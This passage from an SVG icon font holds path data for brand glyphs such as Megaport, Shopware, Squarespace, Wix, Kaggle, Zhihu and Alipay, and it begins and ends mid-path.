c0 -0.200195 0 -0.299805 0.100586 -0.399414zM322.6 195.3c0.600586 3.5 3.10059 6.10059 5.7002 5.7002c2.60059 -0.400391 4.2002 -3.59961 3.7002 -7.09961c-0.599609 -3.60059 -3.09961 -6.10059 -5.7002 -5.7002c-2.59961 0.399414 -4.2002 3.59961 -3.7002 7.09961z
M264.6 196.5c-10.3994 3.7998 -18 4.40039 -31.5 -0.700195c-3.39941 -1.2998 -5.7998 -2.2998 -7 -2.09961c-1.89941 0.299805 0 3.7002 4.10059 7.09961c8.2998 6.7002 19.7002 8.7002 29.5 5.10059c4.2998 -1.60059 9.09961 -4.7002 11.5996 -8.40039
c0.900391 -1.40039 1.2002 -2.5 0.799805 -2.90039c-0.699219 -0.899414 -3.5 0.300781 -7.5 1.90039zM311.3 225.7c-0.0996094 3.39941 0.5 8.89941 3.7002 10c5.40039 1.89941 12.5996 -12 12.9004 -24.2998c-4.30078 2.09961 -9.30078 3.09961 -14.5 2.59961
c-1.30078 3.90039 -1.90039 7.7002 -2.10059 11.7002z" />
    <glyph glyph-name="megaport" unicode="&#xf5a3;" horiz-adv-x="496" 
d="M214.5 238.4l33.4004 33.3994l33.3994 -33.3994v-66.4004l-33.2998 -33.2998l-33.5 33.5v66.2002zM248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM393.1 25.5996h0.100586v87.1006l-59.7002 59.7002v87.5996l-59.5 59.5
v75.5996l-26.0996 19.2002l-26.1006 -19.2002v-75.5996l-59.5 -59.5v-87.9004l-59.5 -59.5v-87l26.1006 -19.1992l26.0996 19.1992v65.5l33.5 33.4004l33.4004 -33.4004v-65.5l26.0996 -19.1992l26.2002 19.1992v65.5l33.3994 33.4004l33.4004 -33.4004v-65.5l26 -19.1992z
" />
    <glyph glyph-name="nimblr" unicode="&#xf5a8;" horiz-adv-x="355" 
d="M232.6 148.71c15.5703 0 27.1504 -11.46 27.1504 -26.96c0 -15.5498 -11.6201 -26.96 -27.1504 -26.96c-15.6992 0 -27.1494 11.5703 -27.1494 26.96c0 15.5098 11.5801 26.96 27.1494 26.96zM99.0098 121.75c0 15.6104 11.6807 26.96 27.1504 26.96
c15.5703 0 27.1494 -11.46 27.1494 -26.96c0 -15.4102 -11.4697 -26.96 -27.1494 -26.96c-15.4404 0 -27.1504 11.3096 -27.1504 26.96zM177.76 289.05c98.3701 0 177.76 -79.0693 177.76 -176.53c0 -97.5693 -79.5195 -176.52 -177.76 -176.52
c-98.1494 0 -177.76 78.8701 -177.76 176.52v335.48l45.25 -227c30.2002 48.2305 97.75 68.0498 132.51 68.0498zM177.76 -19.0703c73.2598 0 132.51 58.9102 132.51 131.59c0 72.6807 -59.2393 131.591 -132.51 131.591c-73.2695 0 -132.51 -58.9102 -132.51 -131.591
c0 -72.6895 59.2402 -131.59 132.51 -131.59z" />
    <glyph glyph-name="rev" unicode="&#xf5b2;" horiz-adv-x="410" 
d="M270.67 173.11c0 -36.1602 -29.4102 -65.5703 -65.5596 -65.5703c-36.1504 0 -65.5703 29.4102 -65.5703 65.5703c0 36.1592 29.4102 65.5596 65.5703 65.5596c36.1592 0 65.5596 -29.4004 65.5596 -65.5596zM410.22 178.16v-210.16h-210.16v0.129883
c-110.939 2.69043 -200.06 93.3896 -200.06 204.98c0 108.529 84.3096 197.319 191.01 204.569v38.3203l108.76 -62.7803l-108.76 -62.79v39.1201c-80.0293 -7.16016 -142.99 -74.5693 -142.99 -156.43c0 -86.6201 70.4707 -157.09 157.091 -157.09
s157.09 70.4697 157.09 157.09c0 55.1895 -28.6406 103.79 -71.8105 131.82l45.3799 26.1992c44.2207 -36.6299 72.8301 -91.4297 74.3203 -152.979h0.129883z" />
    <glyph glyph-name="shopware" unicode="&#xf5b5;" horiz-adv-x="495" 
d="M395.5 -7.26953c-42.9502 -31.79 -93.9502 -48.5908 -147.48 -48.5908c-137.21 0 -248.02 111 -248.02 248c0 137.19 111.04 248 248.02 248c61.3008 0 120.141 -22.5498 165.681 -63.5c2.62012 -2.35938 0.580078 -6.63965 -2.86035 -6.17969
c-17.6699 2.42969 -36.75 3.66016 -56.71 3.66016c-129.36 0 -222.399 -53.4697 -222.399 -155.351c0 -109.039 92.1299 -145.88 176.829 -178.729c33.6406 -13.04 65.4004 -25.3604 86.96 -41.5898c1.90039 -1.44043 1.89062 -4.31055 -0.0195312 -5.71973zM494.96 215.05
c2.00977 -23.0801 2.95996 -64.9199 -15.9297 -113.31c-0.790039 -2.00977 -3.16992 -2.87012 -5.0498 -1.82031c-29.4902 16.3604 -61.6104 28.3398 -92.6807 39.9297c-60.2803 22.4805 -112.34 41.8906 -112.34 84.4902c0 1.45996 -3.87988 53.6299 80.25 53.6299
c50.8604 0 92.7197 -17.5195 144.48 -60.4795c0.719727 -0.610352 1.18945 -1.5 1.26953 -2.44043z" />
    <glyph glyph-name="squarespace" unicode="&#xf5be;" horiz-adv-x="512" 
d="M186.12 104.66l157.22 157.2c38.5703 38.5898 101.13 38.5898 139.72 0c38.5908 -38.5801 38.5908 -101.13 0 -139.721l-119.25 -119.239l-0.0400391 -0.0400391c-19.2891 -19.2705 -50.5498 -19.25 -69.8193 0.0400391l154.149 154.14
c19.29 19.29 19.29 50.5703 0 69.8604s-50.5693 19.29 -69.8594 0l-157.181 -157.181c-9.64941 -9.64941 -25.29 -9.64941 -34.9395 0c-9.65039 9.65039 -9.65039 25.29 0 34.9404zM430.65 209.46c9.63965 -9.63965 9.63965 -25.2803 -0.0107422 -34.9297l-157.199 -157.2
c-38.5801 -38.5703 -101.141 -38.5703 -139.721 0l-0.0195312 0.0195312c-9.64062 9.65039 -9.62988 25.29 0.0195312 34.9307l0.0107422 0.00976562c9.64941 9.63965 25.2793 9.62988 34.9199 -0.00976562l0.0498047 -0.0498047
c19.29 -19.2607 50.5498 -19.2402 69.8193 0.0498047l157.2 157.18c9.64062 9.65039 25.2803 9.65039 34.9307 0zM168.66 122.13c-38.6006 -38.5801 -101.13 -38.5801 -139.73 0.00976562c-38.5801 38.5801 -38.5801 101.13 0 139.721l119.23 119.25l0.0195312 0.0195312
c19.3008 19.2803 50.5703 19.2705 69.8506 -0.0195312l-154.17 -154.17l-0.0302734 -0.0302734c-19.2803 -19.2998 -19.2598 -50.5605 0.0302734 -69.8398l0.00976562 -0.0107422c19.29 -19.29 50.5703 -19.2793 69.8496 0.0107422l157.21 157.18
c9.64062 9.63965 25.2705 9.63965 34.9102 0c9.64062 -9.65039 9.64062 -25.29 0 -34.9404zM81.3301 174.53c-9.64062 9.64941 -9.65039 25.29 0 34.9297l157.189 157.19c38.5908 38.5898 101.131 38.5898 139.721 0c9.64941 -9.64062 9.64941 -25.2803 0 -34.9307
c-9.64062 -9.64941 -25.2803 -9.64941 -34.9307 0l-0.0195312 0.0205078c-19.29 19.2793 -50.5596 19.2695 -69.8398 -0.0205078l-157.21 -157.189c-9.64062 -9.64062 -25.2705 -9.64062 -34.9102 0z" />
    <glyph glyph-name="themeco" unicode="&#xf5c6;" horiz-adv-x="441" 
d="M199.74 435.71c9.74023 5.63965 25.5898 5.73047 35.3896 0.209961l188.13 -105.95c9.81055 -5.51953 17.7598 -19.1396 17.7598 -30.3799v-213.87c0 -11.2598 -7.92969 -24.8896 -17.71 -30.46l-188.22 -107.14c-9.78027 -5.57031 -25.5801 -5.48047 -35.29 0.209961
l-182.22 106.72c-9.70996 5.69043 -17.5801 19.4307 -17.5801 30.6807v213.859c0 11.2598 7.90039 24.96 17.6299 30.5898zM123.54 239c-15.6904 0 -31.3896 -0.139648 -47.0801 -0.139648v-99.8701h18.8301v29.3896h28.25c48.9404 0 48.79 70.6201 0 70.6201zM261.5 140.27
l-30.25 34.1006c36.4004 7.38965 34.2598 64.21 -10.7002 64.4902c-15.8398 0 -31.6699 0.139648 -47.5098 0.139648v-100.01h18.8301v33.3799h18.1299l29.0996 -33.3799h22.4004v1.2793zM220.56 221.31c22.9805 0 22.9004 -31.96 0 -31.96h-28.6797v31.96h28.6797z
M126.49 222.88c20.8496 0 20.7793 -38.2402 0 -38.2402h-31.8105v38.2305zM316.14 240.85c-67.3994 0 -69.8594 -104.149 0 -104.149c68.3906 0.00976562 68.3301 104.149 0 104.149zM316.14 223.73c43.4307 0 44.1006 -69.7607 0 -69.7607
c-44.1201 0 -43.7393 69.7607 0 69.7607z" />
    <glyph glyph-name="weebly" unicode="&#xf5cc;" horiz-adv-x="512" 
d="M425.09 382.17c50.9102 0 87.5498 -35.1504 86.9199 -83.4697c0 -21.6201 -0.950195 -18.5498 -77.5 -227.2c-22.3799 -60.5703 -67.7695 -69.6699 -92.7402 -69.6699c-39.2393 0 -70.0391 19.46 -85.9297 54.29c-15.8896 -34.5205 -46.7002 -53.9805 -85.9297 -53.9805
c-24.9697 0 -70.3701 8.78027 -92.7402 69.3506c-72.9902 200.21 -77.1699 204.52 -77.1699 233.479c0 43.3105 38.5898 77.2002 87.54 77.2002c40.21 0 73.2803 -25.7295 83.6602 -64.3301c18.4795 58.0498 65.5 64.3301 85.2803 64.3301
c19.4492 0 66.7891 -6.26953 84.9492 -64.3301c10.3799 38.6006 43.7803 64.3301 83.6602 64.3301zM451.43 267.36c3.49023 11.1992 7.29004 19.3701 7.61035 27.2393c0 22.3906 -16.1602 35.71 -38.3301 35.71c-18.6904 0 -31.9902 -11.7998 -36.1104 -29.0498
l-44.0293 -139.819h-0.950195l-44.6602 136.79c-6.01953 19.9697 -16.4697 32.0791 -38.96 32.0791s-32.9404 -12.4092 -38.96 -32.0791l-44.6602 -136.79h-0.950195l-44.0293 139.819c-4.12012 17.25 -17.4199 29.0498 -36.1104 29.0498
c-22.4902 0 -38.3301 -13.0195 -38.3301 -29.3594c0 -10.5898 2.54004 -19.6699 7.91992 -34.5l64.9404 -175.23c7.91016 -21.4795 21.2197 -37.2197 46.2393 -37.2197c23.1201 0 37.0605 12.0996 44.0205 33.5996l39.2803 117.42h0.949219l39.2803 -117.42
c6.65039 -21.4893 20.5898 -33.8994 44.0303 -33.8994c25.0195 0 38.3203 15.7295 46.2402 37.2197z" />
    <glyph glyph-name="wix" unicode="&#xf5cf;" horiz-adv-x="640" 
d="M393.38 316.31c0 -13.0293 2.08008 -32.6895 -28.6797 -43.8291c-9.52051 -3.4502 -15.9502 -9.66016 -15.9502 -9.66016c0 31 4.71973 42.2197 17.4004 48.8594c9.75 5.11035 27.2295 4.62988 27.2295 4.62988zM277.58 280.77
c5.47949 26.3408 30.8799 38.3408 55.2998 35.2705l-65.5703 -247.93s-21.6396 -1.56055 -32.46 3.95996c-14.2197 7.25 -20.9893 12.8398 -29.5898 46.5693c-7.66992 30.0703 -29.1494 118.4 -31.1201 124.7c-4.30957 13.8105 -10.6396 14.9404 -15.3994 0
c-2.00977 -6.29004 -23.4502 -94.6299 -31.1201 -124.7c-8.61035 -33.7295 -15.3701 -39.3193 -29.5898 -46.5693c-10.8301 -5.52051 -32.46 -3.95996 -32.46 -3.95996l-65.5703 247.93c23.8604 3 49.7305 -8.5498 55.2803 -35.2705l34.2393 -132.659l28.4805 108.569
c7.76953 32.3506 21.0596 48.5303 48.4297 48.5303c27.6201 0 40.7402 -16.54 48.4307 -48.5303l28.4795 -108.569zM393.36 275.56v-8.97949l0.0195312 0.00976562v-150.27c-0.129883 -30.8301 -3.33008 -37.6807 -17.2598 -44.7803
c-10.8203 -5.52051 -27.3701 -3.42969 -27.3701 -3.42969v152.069c0 21.25 -1.95996 27.9404 13.1797 35.2002c6.19043 2.96973 11.96 5.25 17.9707 8.61035c9.35938 5.22949 13.46 11.5693 13.46 11.5693zM556.8 191.48l82.9902 -123.36s-35.9297 -4.62012 -53.3203 11.21
c-13.9102 12.6602 -23.7393 28.3398 -53.1396 70.7197c-0.5 0.770508 -6.25977 10.5205 -13.0703 0c-34.9297 -50.3496 -41.0195 -60.2598 -52.5098 -70.7197c-17.3799 -15.8301 -53.9502 -11.21 -53.9502 -11.21l82.9697 123.36l-83.1992 123.739
s35.1094 5.98047 52.5 -9.84961c13.3799 -12.1797 24.8896 -30.2402 54.1797 -72.4697c6.82031 -10.54 12.5996 -0.730469 13.0703 0c29.7695 42.9199 40.8799 60.3691 54.1797 72.4697c17.3896 15.8301 52.5 9.84961 52.5 9.84961z" />
    <glyph glyph-name="ello" unicode="&#xf5f1;" horiz-adv-x="496" 
d="M248 440c136.97 0 248 -111.03 248 -248s-111.03 -248 -248 -248s-248 111.03 -248 248s111.03 248 248 248zM391.84 154.8c2.48047 7.44043 -2.47949 15.71 -9.91992 17.3604c-7.43945 2.47949 -15.71 -2.48047 -17.3604 -9.91992
c-14.0498 -52.9102 -62 -90.1104 -116.56 -90.1104s-102.51 37.2002 -116.56 90.1104c-1.65039 7.43945 -9.9209 11.5693 -17.3604 9.91992c-7.44043 -1.65039 -11.5703 -9.91992 -9.91992 -17.3604c16.5303 -65.3096 76.0498 -111.6 143.84 -111.6
s127.31 46.29 143.84 111.6z" />
    <glyph glyph-name="hackerrank" unicode="&#xf5f7;" horiz-adv-x="464" 
d="M453.5 320c14.4805 -24.9502 14.4697 -230.92 -0.00976562 -256c-14.4805 -25.0801 -192.391 -128 -221.33 -128c-28.9404 0 -206.83 102.79 -221.32 127.99c-14.4902 25.21 -14.4102 230.8 0 256.01s192.36 128 221.32 128c28.9697 0 206.85 -103.05 221.34 -128z
M292.13 33.7803c3.95996 0 40.46 35.7793 37.5801 38.6895c-0.870117 0.879883 -8.82031 1.49023 -17.6904 1.83984c0 32.4004 -2.98926 19.0508 0.660156 210.341c0.0703125 3.65918 -1.04004 5.35938 -4.5 5.37988
c-11.0801 0.0693359 -22.1602 0.0195312 -33.2295 -0.0605469c-3.25977 -0.0292969 -4.31055 -1.80957 -4.20996 -5.2002c1.58984 -48.8994 1.2002 -79.0898 1.2002 -83.6396h-80.2607c0.600586 25.7998 0.209961 79.6396 2.62988 105.39v3.16016
c8.87012 0.350586 15.9004 0.970703 16.7705 1.83984c2.90039 2.91016 -34.3105 38.6904 -38.2705 38.6904c-3.94922 0 -41.4092 -35.7695 -38.4893 -38.6904c0.879883 -0.879883 7.58984 -1.48926 17.2598 -1.83984v-3.16992
c3.11035 -128.649 1.07031 -179.229 0.150391 -212.67c-0.130859 -4.58008 1.63965 -6.12012 5.73926 -6.10938c10.1406 0.0292969 20.2803 -0.0507812 30.4102 -0.0800781c4.16016 -0.0205078 5.96973 1.39941 5.74023 5.93945
c-1.83008 36.6797 -1.37012 65.7803 -1.37012 72.8799h79.9297c0 -2.41992 0.480469 -3.83008 0.44043 -5.84961c-0.350586 -17.7305 -0.94043 -60.0898 -0.94043 -86.3203c-11.29 -0.349609 -16.6797 -0.959961 -17.5498 -1.83008
c-2.91016 -2.91992 34.04 -38.6895 38 -38.6895z" />
    <glyph glyph-name="kaggle" unicode="&#xf5fa;" horiz-adv-x="291" 
d="M290.2 -53.5l1.39941 -7.59961c-0.5 -2 -2.5 -3 -6 -3h-66.8994c-4 0 -7.5 1.7998 -10.5 5.2998l-110.5 140.6l-30.7998 -29.2998v-109c0 -5 -2.5 -7.5 -7.5 -7.5h-51.9004c-5 0 -7.5 2.5 -7.5 7.5v497c0 5 2.5 7.5 7.5 7.5h51.9004c5 0 7.5 -2.5 7.5 -7.5v-306
l132.3 133.7c3.5 3.5 7 5.2998 10.5 5.2998h69.2002c7 0 7.89941 -7.7998 5.2998 -10.5l-139.8 -135.3z" />
    <glyph glyph-name="markdown" unicode="&#xf60f;" horiz-adv-x="640" 
d="M593.8 388.9c25.5 0 46.2002 -20.7002 46.2002 -46.1006v-301.6c0.0996094 -25.4004 -20.5996 -46.1006 -46.0996 -46.1006h-547.7c-25.5 0 -46.2002 20.7002 -46.2002 46.2002v301.5c0 25.4004 20.7002 46.1006 46.2002 46.1006h547.6zM338.5 87.4004h-0.200195v209.199
h-61.5l-61.5 -76.8994l-61.5 76.8994h-61.5v-209.199h61.7002v120l61.5 -76.9004l61.5 76.9004v-120h61.5zM473.8 84.2998l92.2002 107.7h-61.5v104.6h-61.5v-104.6h-61.5z" />
    <glyph glyph-name="neos" unicode="&#xf612;" horiz-adv-x="456" 
d="M387.44 -64h-95.1104l-108.21 154.54v-91.0996l-86.4297 -63.4404h-97.6904v482.18l40.4697 29.8203h108.05l123.74 -176.13v112.68l86.4307 63.4502h97.6895v-461.5zM10.7695 412.73v-460.721l72.0107 52.8799v249.16l215.489 -307.689h84.79l52.3506 38.1699h-78.2705
l-316.18 450.489zM93.3096 -53.8799l80.04 58.7803v101.04l-79.7998 114.359v-220.939l-72.5801 -53.25h72.3398v0.00976562zM52.6299 437.23l310.601 -442.57h82.3691v442.57h-79.75v-317.561l-222.939 317.561h-90.2803zM283.03 256.35l72.0098 -102.81v278.53
l-72.0098 -52.96v-122.761z" />
    <glyph glyph-name="zhihu" unicode="&#xf63f;" horiz-adv-x="640" 
d="M170.54 299.87h122.68v-217.55h-49.5293l-42.0107 -26.3701l-7.70996 26.3701l-23.4297 0.00976562v217.54zM268.29 105.94v170.31h-72.8203v-170.31l11.9004 -0.0400391l5.08008 -17.4707l27.8994 17.5107h27.9404zM149.83 200.33
c7.5 0 7.58984 -23.6104 7.58984 -23.6104h-61.6504c-0.879883 -13.1201 -3.50977 -26.6895 -7.86914 -40.6699l14.6191 11.6201c8.73047 -8.75 29.2109 -32.8896 36.79 -41.8096c9.15039 -13.1006 1.24023 -39.9902 1.24023 -39.9902l-53.96 64.9395
c-12.6094 -48.3496 -35.5898 -69.25 -35.5898 -69.25c-10.0898 -8.96973 -30.5098 -15.75 -51 -9.89941c42.8301 33.2197 66.4502 75.2402 70.8496 125.1h-65.5801s3.82031 23.6201 15.5605 23.6201h52.2695c0.480469 6.56055 1.68066 62.9404 1.68066 73.4404h-28.8701
c-2.62988 -7.87012 -3.03027 -8.64062 -5.14062 -14.5303c-11.4697 -21.0303 -30.9492 -21.5703 -36.8398 -22.21c17.4902 34.9795 27.3105 69.2197 30.7002 78.1201c8.2002 21.5693 32.2705 21.5693 32.2705 21.5693c-5.25 -14.0098 -9.63086 -27.5498 -13.1201 -40.6699
h88.5c10.5498 0.25 8.58008 -22.3096 8.58008 -22.3096h-51.1602c0 -21.8701 -0.459961 -46.3604 -2.2002 -73.46h52.3301zM561.85 201.93l-19.2295 14.4307s30.8301 40.0498 36.8301 48.1992c8.72949 10.7402 27.3799 -4.05957 27.3799 -4.05957
s-24.1504 -32.9297 -44.9805 -58.5703zM411.76 261.02l0.00976562 0.0107422c8.99023 -8.25 34.6602 -45.8604 34.6602 -45.8604l-19.46 -13.7295c-1.59961 2.40918 -41.1201 57.4492 -41.1201 57.4492s16.9004 10.3799 25.9102 2.12988zM640 189.65
c0 0 0.950195 -23.79 -8.73047 -23.79h-122.359v-73.3203c0.780273 -28.0303 -15.3301 -45.3096 -44.8906 -45.3096c-9.84961 0 -16.1396 1.75977 -26.0195 6.56934c-12.9805 7.4502 -17.3203 17.8701 -19.3096 21.8398c15.6094 -0.65918 27.6094 -1.91992 41.6895 -1.80957
c13.29 -0.870117 24.4805 7.15039 24.4805 21.1201v70.9199h-107.94c-22.6895 0.540039 -25.5098 22.8496 -25.5098 22.8496h133.47v99.8105c-12.8301 0 -31.6797 -0.830078 -56.5098 -2.43066c-26.46 -0.80957 -35.8398 -2.58984 -49.1504 0.890625
c-8.16016 2.46973 -14.1797 10.7295 -15.7793 19.5498c67.1396 1.55957 232.359 18.0498 232.359 18.0498s20.1006 5.75977 23.1699 4.58008c12.8105 -6.25 0.589844 -33.4395 0.589844 -33.4395c-17.6396 -0.810547 -46.8896 -2.40039 -87.7695 -4.81055
c-10.4297 -0.799805 -18.04 -1.2002 -22.8496 -1.2002v-101c0.149414 0 111.279 0.930664 131.06 0.930664z" />
    <glyph glyph-name="alipay" unicode="&#xf642;" 
d="M377.74 416c38.6895 0 70.0898 -31.5703 69.9297 -70.2598v-234.41c-48.6104 16.7002 -99.6895 36.04 -148.62 52.7402c23.1406 44.2998 38.3506 90.9199 38.3506 90.9199h-88.7705v31.2402h109.45v19.0098h-109.44v50.4199h-50.9199v-50.4199h-109.439v-19.0098h109.439
v-31.2402h-92.0801v-16.7002h178.2s-9.91992 -30.25 -26.4502 -60.3398c-47.7793 14.71 -91.75 24.96 -127.13 24.96c-84.6396 0 -103.49 -42.4902 -99.5195 -81.5c3.30957 -31.0703 26.4502 -76.3701 97.04 -76.3701c64.4795 0 116.55 37.0303 148.62 81
c61.0098 -28.0996 125.64 -62.8203 171.6 -88.4404c-0.5 -38.5195 -31.7402 -69.5996 -70.2598 -69.5996h-307.48c-38.8496 0 -70.2598 31.4102 -70.2598 70.2598v307.48c0 38.8496 31.4102 70.2598 70.2598 70.2598h307.48zM47.2803 125.05
c-0.990234 17.5205 10.9102 50.5801 78.3594 50.5801c24.96 0 64.8105 -12.7295 109.44 -31.4102c-25.29 -33.2197 -65.7998 -72.8994 -117.87 -72.8994c-59.6797 0 -68.9404 33.5596 -69.9297 53.7295z" />
    <glyph glyph-name="the-red-yeti" unicode="&#xf69d;" horiz-adv-x="505" 
d="M484.4 206.3c2.19922 -3 4.69922 -6.89941 6.7998 -13.2998c4.2002 -11.7998 7.2002 -22.9004 8.89941 -34.2002l-2.5 -0.5l-13 14.2998c-17.8994 -28.0996 -9.89941 -15.3994 -16.6992 -25.0996c0 -124.2 -101.301 -211.5 -223 -211.5
c-61.5 0 -113.9 20.2002 -157.5 60.2002c-64.5 60.8994 -64.9004 125 -64.9004 150.5c-0.5 1.7998 -0.700195 3.5 -1.2002 5.2002l-20.2002 -22.4004c-6.7998 43 25.7002 74.2998 33 80.7002c0.5 1 0.700195 2.2002 1.2002 3.2002l-28.7998 1l-3 3.39941
c8.5 3.5 25.2998 13.2998 40.2998 14.2998c7.40039 14.2002 16.5 27.5 27.7998 40.3008c1.30078 6.39941 3.30078 14.1992 6.60059 25.7998l-7.60059 -4.7002l-1.69922 1.7002l1.69922 8.39941c10.8008 25.6006 26 48 46.7002 67.4004l-33 14.2998h3.7002
c20.9004 4.90039 33.2002 3.2998 49.2002 0c-2.5 4.10059 -5.40039 10.5 -8.40039 18.9004c-2.89941 8.09961 -2.89941 16.5 0.5 25.2998c8.90039 -7.40039 14.2998 -24.5996 15.2002 -27c0.700195 3.59961 2.09961 21.2998 33.7002 45.5l1.7998 -0.5l-12 -44.2002
c30 17.7002 63 21.9004 97.9004 11.7998c-12.7002 -12.1992 -24.3008 -28.8994 -42.5 -33c7.39941 -2.2998 28.6992 -9.69922 34.1992 -15.1992l-24.7998 7.09961c6.5 -6 19.6006 -16.4004 25.1006 -25.0996c24.3994 -1.30078 47.1992 -5.7002 68.3994 -13.3008l-0.5 0.5
c29.4004 14.7002 37.7002 27.3008 74.7998 3c0 -30.1992 -2.2998 -23.3994 3 -29.7998c7.60059 6.40039 16.5 12.2998 25.3008 16.5c13 6.40039 23.0996 4.7002 30.6992 -5.89941c11.8008 0 17.8008 -15.7002 18.4004 -27c14.7998 -2.90039 2.7002 -30.7002 2.5 -30.7002
l-7.09961 -18.2002c7.7998 -7.7998 22.0996 -20.9004 31.6992 -44.7998zM394.2 336.8c-13.1006 8.90039 -22.7002 11.9004 -28.2998 8.5c8.09961 -7.2002 13 -14.2998 13.5 -20.7002c1.19922 -7.59961 -2.2002 -14.7998 -10.6006 -21.8994l-4.2002 -3.40039
c4.2002 -7.09961 7.2002 -14.7002 8.40039 -23.0996h2.5c-2.09961 13.8994 -2.5 11 0.700195 14.7998c11 -6.40039 14.8994 -14.5 16 -19.9004c21.7998 10.1006 29.5 12.7002 54.7998 20.9004l-18.2002 -16c11.4004 0 25.6006 0.299805 46.5 -8.40039
c7 24.3008 7.10059 20.7002 2.5 20.7002l-4.7002 -11.2998c-1.69922 10.5 -2.89941 18.9004 -3.39941 25.2998c-0.5 6.7002 -3.90039 9.60059 -9.2998 10.1006c0 -5.90039 0.5 -11 1.69922 -15.2002l-1.69922 -5.90039c-2.90039 10.6006 -5.90039 20.2002 -9.30078 27.7998
c-9.69922 17.7002 -30.1992 -9.19922 -43 -11.2998c8.10059 -0.5 16.9004 -0.5 27 0l-22.3994 -5.39941l3.39941 -4.7002c-5.5 0 -16.8994 -0.900391 -22.3994 17.2002zM354.6 346.9l-20.2998 -11.8008c11.2998 -7.59961 20.2002 -18.1992 27.7998 -31.1992
c6.40039 2.89941 10.1006 5.09961 11.8008 7.59961c2.5 2.7998 2.5 4.7002 3 7.09961c0.599609 1.30078 0.799805 2.7002 -3.40039 11.1006c-7.5 11.7998 -16.2002 15.2998 -18.9004 17.2002zM87.2002 304.9c-7.7998 -24.1006 -11.7002 -49.4004 -13.2002 -74.6006
l13.2002 -5l1.2002 27c9.5 -16.3994 11.1992 -23.2998 12.2998 -28.7998c2.7998 2.09961 7.7002 7 22.5996 11.2998l1.2002 -1.7002l-7.59961 -10.5996c10.0996 3.5 19.5 3.5 28.2998 0.5l-10.6006 -8.40039c22.8008 -8.39941 26.6006 -7.59961 38.4004 -26.0996
l-11.7998 1.2002c34.8994 -20.5 66 -47.9004 141.2 -63.2002c15.5996 24.0996 14 21.0996 14 22.9004l0.199219 0.199219l-0.199219 0.200195c-0.700195 1.90039 -14.1006 16.6006 -18.2002 20.7002c7.2998 -1.7998 6 -0.900391 10.7998 -3.7002
c1.7002 -0.899414 -5.40039 5.40039 -21.9004 20.2002c16.5 -6.7002 27.6006 -15.5 33 -27.7998l1.7002 30.7002l-22.3994 17.6992l6.39941 5.90039c-7.2998 0 -31 3.7002 -49.2002 -16l-2.5 0.5c8.2002 16.4004 13.7002 35.2002 16 46c1.80078 8.90039 3 18.2002 3 28.2998
c0 19.5 -4.69922 38.4004 -13.5 56.6006c-6.39941 13.5 -16.5 25.2998 -30 35.3994c-6.39941 4.7002 -13.0996 9.2998 -20.6992 13.5c3 0.700195 1 1.2002 -5.40039 1.2002c-6.40039 0.200195 -13 0.700195 -19.4004 1.2002v-3
c-10.0996 -1.7002 -18.8994 -6.7998 -25.2998 -15.2002h-1.2002l-5.39941 -3.40039c-1.2002 2.90039 0 6.30078 4.2002 9.30078l10.5996 11.2998l-3.40039 -0.5l2 3.39941c-2.2998 0.200195 -4.19922 0.5 -6.19922 0.700195l-0.5 1.2002l2.5 1.7002
c2.19922 -0.200195 4.59961 -0.5 7.09961 -0.700195c4.2002 2.2002 8.7998 3 14 2l2.5 -1.2002l0.200195 -0.5c7.2002 0.400391 14.7998 1.40039 23.3994 2.90039c20.7002 2.89941 36.7002 11.2998 48.5 24.7998l-21.0996 0.5
c-25.7998 0.5 -49.4004 -5.40039 -71.2998 -18.9004l-2.5 2.5l0.5 4.7002l1.7002 7.10059c1.69922 8.09961 3.5 16.3994 6.39941 25.2998c-1.7002 -0.700195 -4.59961 -4.90039 -9.2998 -11.2998c-4.7002 -6.40039 -8.40039 -13 -10.0996 -19.4004
c-1.7002 -7.2002 -4.2002 -11.7998 -5.90039 -14.2998l-13.5 29l8.40039 -35.7998l-0.5 -1.7002c-5.40039 0 -10.6006 0.799805 -16 2.5c-3.40039 0.700195 -10.6006 1.2002 -20.9004 1.2002c0.5 0 -0.700195 0 -3.2002 -0.5
c5.40039 -1.30078 13.5 -4.2002 24.7998 -8.40039l6.40039 1.2002c-4.2002 -3.40039 -10.9004 -10.1006 -20.2002 -19.4004c-9.39941 -8.89941 -20.2002 -26.0996 -32.5 -50.2002l4.2002 1.2002l10.0996 9.2998l-5.39941 -4.69922l13 12.2998l-2.5 -3.40039
c-5.10059 -7.59961 -8.10059 -12.2998 -9.2998 -15.2002zM363.7 -25.0996c8.2998 40.2998 3.59961 55.1992 -0.700195 89.5c-35.5 -11.8008 -20.2998 -6 -32 -10.8008l10.5 -14.1992l-1.2002 -1.2002c-20.2002 6 -23.2002 10.7998 -27.7998 15
c6 -22.2002 13.9004 -26.4004 29.5 -31.7002c-9.5 -9.59961 -25.4004 4 -34.4004 13l2.5 -23.5996l-4.19922 -3c-5 22.0996 -22 39.0996 -25.3008 39.0996c-44 -13 -79.0996 -5.7998 -113.899 10.5996c-1.60059 -0.399414 -70.6006 -18 -120.5 37.1006
c13.7002 -35 32.2998 -63.7002 71.2998 -82.6006c-4.7002 10.1006 -11.9004 19 -20.7002 26.6006c0 0 0.700195 3.7002 1.2002 10.0996c19.4004 -19.3994 50.7002 -39.5 93.2002 -60.2002c-59.6006 24.5 -59.9004 24.8008 -69.1006 29l16 -20.6992
c-3 -1.30078 -6.69922 -0.5 -10.0996 1.19922c-12.2998 7.10059 -24.0996 15.5 -35.4004 24.8008c1.90039 -2.2002 80.1006 -98.5 200.9 -74.3008c-43.0996 21.8008 -52.4004 52.4004 -66.5996 73.5l17.6992 -7.59961l-11.7998 23.0996
c20.1006 -27.7998 28.6006 -35 38.4004 -44.2998l-30 16.5c12.5996 -27.0996 33.7002 -47 63.5 -58.7998c2.89941 1.5 9.09961 -1.09961 59 23.9004zM479 189.3l8.90039 -12.7998l-12.3008 32.5c10.9004 0 10 -0.0996094 21.2002 -3.40039
c-8.09961 11.3008 -16.8994 21.9004 -27 32l-26.5996 23.1006l1.2002 3l23.5996 2.5c-11.0996 2.5 -21.7002 3.7002 -33 4.2002l-17.7002 -0.5l-0.5 2.89941l14.7998 13l-41.7998 -20.2002l-12.2998 18.9004l3.40039 -16l-2.5 -1.2002l-5.90039 4.2002h-10.0996
l5.39941 -4.2002v-2l-13.5 -27.7998c-10.0996 -31.2002 -21.8994 -67.9004 -35.3994 -109.7l1.19922 16l-1.19922 -3v-0.5c-6.40039 -16 -13.6006 -29.5 -21.2002 -39.5996l9.2998 21.8994l-46.7002 -20.1992c11.7998 13.5 23.6006 19.3994 34.9004 18.8994
